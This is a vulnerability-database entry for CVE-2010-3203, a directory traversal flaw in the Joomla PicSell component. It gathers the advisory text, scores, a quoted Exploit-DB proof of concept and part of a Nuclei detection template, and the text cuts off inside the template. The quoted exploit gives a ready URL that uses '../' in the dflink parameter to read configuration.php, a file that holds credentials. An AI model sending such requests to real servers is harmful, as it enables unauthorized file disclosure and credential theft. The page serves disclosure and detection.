CVE-2010-3203
published 2010-09-03CVE-2010-3203: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in…
PriorityP339medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
8.52%
94.4th percentile
Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xmlswf | com_picsell | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component PicSell 1.0 - Local File Disclosure
exploitdb·2010-08-30
CVE-2010-3203 Joomla! Component PicSell 1.0 - Local File Disclosure
Joomla! Component PicSell 1.0 - Local File Disclosure
---
# Author: Craw
# Email: [email protected]
# Software Link: http://vm.xmlswf.com/index.php?option=com_content&view=article&id=104&Itemid=131
# Category: web applications
[+] ExploiT :
http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=[File Disclosure]
[+] Example :
http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
Greetz @ LUXEMBOURG
Nuclei
Joomla! Component PicSell 1.0 - Arbitrary File Retrieval
nuclei·CVSS 5.0
CVE-2010-3203 [MEDIUM] Joomla! Component PicSell 1.0 - Arbitrary File Retrieval
Joomla! Component PicSell 1.0 - Arbitrary File Retrieval
A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
Template:
id: CVE-2010-3203
info:
name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to retrieve arbitrary files from the server.
remediation: Upgrad
2010-09-03
Published